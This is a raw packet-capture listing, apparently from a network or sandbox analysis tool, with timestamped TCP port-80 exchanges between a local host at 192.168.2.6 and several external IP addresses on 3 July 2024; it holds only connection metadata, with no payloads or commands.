                                                                Jul 3, 2024 08:38:25.760694027 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760723114 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760767937 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760780096 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760791063 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760803938 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760831118 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760987997 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760999918 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761012077 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761022091 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761024952 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761034966 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761045933 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761054039 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761056900 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761070013 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761085987 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761105061 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761255026 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761284113 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761358023 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761369944 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761380911 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761390924 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761392117 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761404991 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761415958 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761418104 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761428118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761445045 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761464119 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761785984 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761795998 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761807919 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761816025 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761820078 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761831045 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761842012 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761848927 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761853933 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761866093 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761874914 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761878014 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.761895895 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.761909008 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.762252092 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762264013 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762274027 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762284994 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762294054 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.762298107 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762310028 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762320995 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762325048 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.762332916 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762345076 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762355089 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.762355089 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.762365103 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.762393951 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790075064 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790090084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790102005 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790136099 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790158033 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790169001 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790169954 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790183067 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790189981 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790194988 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790215015 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790241003 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790304899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790344000 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790375948 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790412903 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790443897 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790456057 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790467024 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790476084 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790479898 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790493011 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790503025 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.790505886 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.790538073 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.808809996 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.808824062 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.808835983 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.808856010 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.808857918 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.808868885 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.808887959 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.808888912 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.808900118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.808921099 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.808938026 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.809108019 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.809118986 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.809129953 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.809149027 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.809151888 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.809166908 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.809173107 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.809201002 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.809556007 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.809567928 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.809577942 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.809588909 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.809626102 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.847794056 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.847810030 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.847821951 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.847832918 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.847846031 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.847846985 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.847872972 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.847919941 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:28.622006893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:28.622070074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:30.854106903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:30.855648041 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:33.320434093 CEST4972480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:33.325407028 CEST804972477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:33.325495005 CEST4972480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:33.325699091 CEST4972480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:33.330640078 CEST804972477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:34.001858950 CEST804972477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:34.001929998 CEST4972480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:34.002868891 CEST4972480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:34.007702112 CEST804972477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:34.217519045 CEST804972477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:34.219019890 CEST4972480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:34.223206043 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:34.228110075 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.228379011 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:34.228379965 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:34.233253956 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924206972 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924228907 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924241066 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924269915 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924282074 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924293041 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924388885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:34.924415112 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924426079 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924437046 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924448013 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.924468040 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:34.924468040 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:34.924498081 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:34.929441929 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.929487944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.929501057 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:34.929582119 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.049583912 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.049618006 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.049629927 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.049676895 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.049685955 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.049699068 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.049722910 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.049738884 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.049979925 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.050026894 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.050038099 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.050064087 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.050102949 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.050132990 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.050143957 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.050236940 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.050896883 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.050934076 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.050944090 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.050968885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.050968885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.051049948 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.051062107 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.051103115 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.051142931 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.051832914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.051877975 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.051891088 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.051937103 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.051949024 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.051950932 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.051950932 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.051996946 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.051996946 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.052709103 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.052757978 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.052769899 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.052772045 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.052819967 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.054486036 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.054544926 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.169624090 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.169647932 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.169661045 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.169713020 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.169713020 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.169747114 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.169760942 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.169810057 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.169833899 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.169855118 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.169882059 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.169891119 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.169919968 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.169945002 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170056105 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170125961 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170164108 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170164108 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170181036 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170192957 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170202971 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170226097 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170241117 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170350075 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170361996 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170372009 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170423985 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170423985 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170583963 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170634031 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170676947 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170687914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170742989 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170742989 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170824051 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170835972 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170918941 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170933008 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170933008 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.170948029 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.170978069 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171027899 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171051979 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171062946 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171166897 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171202898 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171271086 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171289921 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171300888 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171325922 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171358109 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171366930 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171410084 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171422005 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171438932 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171451092 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171461105 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171483040 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171483040 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171534061 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171612024 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171755075 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.171926975 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171978951 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.171988964 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.172005892 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.172029972 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258038044 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258078098 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258091927 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258104086 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258126974 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258126974 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258130074 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258158922 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258203983 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258208990 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258230925 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258244038 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258275032 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258316994 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258321047 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258419037 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258439064 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258501053 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258502007 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258579969 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258622885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258622885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258646965 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258661985 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258698940 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258709908 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258738041 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258748055 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.258800983 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.258848906 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.291555882 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291584969 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291595936 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291625977 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.291630983 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291666031 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291676044 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.291716099 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.291716099 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.291754961 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291768074 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291812897 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.291812897 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.291862965 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291876078 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291887045 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.291917086 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.291961908 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292140961 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292192936 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292205095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292227983 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292227983 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292260885 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292284966 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292299032 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292347908 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292529106 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292587042 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292598009 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292615891 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292638063 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292665958 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292754889 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292793036 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292849064 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292854071 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292861938 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292934895 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.292951107 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292968035 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292979956 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.292998075 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293031931 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.293230057 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.293293953 CEST804972577.91.77.81192.168.2.6
